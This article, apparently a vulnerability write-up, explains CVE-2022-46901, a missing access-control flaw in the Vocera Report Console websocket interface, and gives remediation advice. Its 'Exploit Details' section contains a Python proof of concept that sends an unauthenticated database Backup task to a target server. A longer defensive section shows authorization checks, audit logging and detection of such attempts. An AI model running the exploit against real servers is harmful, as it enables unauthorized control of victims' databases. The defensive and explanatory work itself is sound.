In this article, we will discuss a security vulnerability tracked as CVE-2022-46901 that has been discovered in Vocera Report Server and Voice Server versions 5.x through 5.8. This vulnerability allows an attacker to perform administrative tasks and execute database operations without proper authentication. By exploiting this vulnerability, an attacker can take control of the database, perform malicious activities, and compromise the overall integrity of the system.

Description of the Vulnerability

The Vocera Report Console has a websocket interface that supports various tasks and database functions. Unfortunately, this interface does not properly enforce access controls, which could allow unauthorized users to execute critical tasks, such as backing up, loading, and clearing the database. This lack of proper access control is the core of the CVE-2022-46901 vulnerability.

Exploit Details

To understand the impact of this vulnerability, let us examine a code snippet that demonstrates the exploitation of CVE-2022-46901. In this code snippet, we will connect to the websocket interface and execute an unauthorized database backup.

import websocket  # provided by the websocket-client package
import json

target_server = 'ws://<vulnerabledomain>:80'
task_id = '1234'

# Connection to the websocket interface
ws = websocket.WebSocket()
ws.connect(target_server)

# Initiating unauthorized backup task
cmd = json.dumps({
    'Task': {
        'ID': task_id,
        'Action': 'Backup'
    }
})

ws.send(cmd)
response = ws.recv()

# Checking the response
if "STATUS_COMPLETED_SUCCESSFULLY" in response:
    print(f'Database backup task {task_id} executed successfully without authentication.')
else:
    print('Vulnerability not exploited.')

ws.close()

Successful execution of this code snippet results in an unauthorized backup of the database. This vulnerability has severe consequences, as it allows an attacker to perform tasks and database operations without authentication, posing a serious risk to the affected environment.

Original References

Users should be aware of the vulnerability and of the official references that provide further information and remediation steps. The following links provide details about CVE-2022-46901:

1. CVE-2022-46901 vulnerability information in the CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46901
2. Vocera Security Advisory: https://www.vocera.com/support/security-advisories

Mitigation and Remediation

To protect the integrity of the Vocera Report Server and Voice Server, organizations using versions 5.x through 5.8 should consider taking the following steps:

1. Upgrade to the latest version of the software, as it may contain patches or improvements that address the vulnerability.
2. Implement proper access control mechanisms and limited privileges for the database and its associated tasks.
3. Monitor the systems for any potential signs of exploitation or suspicious activity.
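The two remediation steps above (enforcing access control on the task interface and monitoring for exploitation attempts) can be illustrated on the defender's side. The following Python block is an added example written for this article; it is not Vocera's code and does not reflect how the real Report Console is implemented. It assumes a message shape matching the snippet shown earlier ({"Task": {"ID": ..., "Action": ...}}), and the session model, role names, permission table, and audit log format are all assumptions made for the example. The handler applies default deny: a task request is only executed when the session has authenticated and its role is permitted to run that action, every decision is written to an audit trail, and a small detector then scans that trail for privileged task requests issued by sessions that never authenticated, which is the behaviour an exploit attempt against this class of flaw would produce.

```python
import json
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Privileged Report Console task actions named in the advisory text
# (backing up, loading, and clearing the database). The "Status" action
# and the role-to-permission mapping are assumptions for this example.
PRIVILEGED_ACTIONS = {"Backup", "Load", "Clear"}
ROLE_PERMISSIONS = {
    "admin": {"Backup", "Load", "Clear", "Status"},
    "operator": {"Status"},
}


@dataclass
class Session:
    """Per-websocket-connection state (assumed model). user=None means the
    connection has never completed authentication."""
    session_id: str
    user: Optional[str] = None
    role: Optional[str] = None


def parse_task(raw: str) -> Optional[Tuple[str, str]]:
    """Parse a Task message of the shape used above. Returns (task_id, action)
    or None for anything malformed, so the caller can fail closed."""
    try:
        msg = json.loads(raw)
        task = msg["Task"]
        return str(task["ID"]), str(task["Action"])
    except (ValueError, KeyError, TypeError):
        return None


def authorize_task(session: Session, raw: str,
                   audit: Optional[List[str]] = None) -> Tuple[bool, str]:
    """Decide whether a task request may run. Default deny: malformed messages,
    unauthenticated sessions and roles lacking the action are all refused.
    Every decision is appended to `audit` as a single key=value log line."""
    audit = audit if audit is not None else []
    parsed = parse_task(raw)
    if parsed is None:
        audit.append(f"DENY session={session.session_id} action=? task=? reason=malformed")
        return False, "malformed"
    task_id, action = parsed
    if session.user is None:
        audit.append(f"DENY session={session.session_id} action={action} "
                     f"task={task_id} reason=unauthenticated")
        return False, "unauthenticated"
    allowed = ROLE_PERMISSIONS.get(session.role or "", set())
    if action not in allowed:
        audit.append(f"DENY session={session.session_id} user={session.user} "
                     f"action={action} task={task_id} reason=forbidden")
        return False, "forbidden"
    audit.append(f"ALLOW session={session.session_id} user={session.user} "
                 f"action={action} task={task_id} reason=ok")
    return True, "ok"


def flag_unauthenticated_task_attempts(audit_lines: List[str], threshold: int = 1) -> dict:
    """Detection over the audit trail: count privileged task requests that were
    refused because the session had not authenticated, per session id, and
    return the sessions at or above `threshold`."""
    hits = {}
    for line in audit_lines:
        parts = line.split()
        if not parts or parts[0] != "DENY":
            continue
        fields = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
        if fields.get("reason") == "unauthenticated" and fields.get("action") in PRIVILEGED_ACTIONS:
            sid = fields["session"]
            hits[sid] = hits.get(sid, 0) + 1
    return {sid: n for sid, n in hits.items() if n >= threshold}


def demo() -> Tuple[List[str], dict]:
    """Run a constructed sequence of requests through the handler and the
    detector. All sessions and messages here are constructed sample input."""
    audit: List[str] = []
    backup = json.dumps({"Task": {"ID": "1234", "Action": "Backup"}})
    status = json.dumps({"Task": {"ID": "9", "Action": "Status"}})
    authorize_task(Session("s1"), backup, audit)                     # never logged in
    authorize_task(Session("s2", "alice", "admin"), backup, audit)   # permitted
    authorize_task(Session("s3", "bob", "operator"), backup, audit)  # wrong role
    authorize_task(Session("s3", "bob", "operator"), status, audit)  # permitted
    authorize_task(Session("s4"), "not json at all", audit)          # malformed
    return audit, flag_unauthenticated_task_attempts(audit)


if __name__ == "__main__":
    lines, flagged = demo()
    print("\n".join(lines))
    print("sessions to investigate:", flagged)
```

The key design choice is that authentication and authorization are checked inside the message handler itself rather than only at connection time, so a client that opens the socket and immediately sends a task message gets refused and logged. The audit lines are written in a fixed key=value form precisely so that the detector (or a SIEM rule) can parse them without guesswork.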

In conclusion, CVE-2022-46901 is a severe security vulnerability that affects Vocera Report Server and Voice Server versions 5.x through 5.8. This vulnerability allows unauthorized users to access and manipulate critical database operations, posing significant risks to the affected systems. System administrators should take immediate action to patch the vulnerability or implement the necessary security measures to protect their organizations from potential exploitation of this vulnerability.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 01:32:00 UTC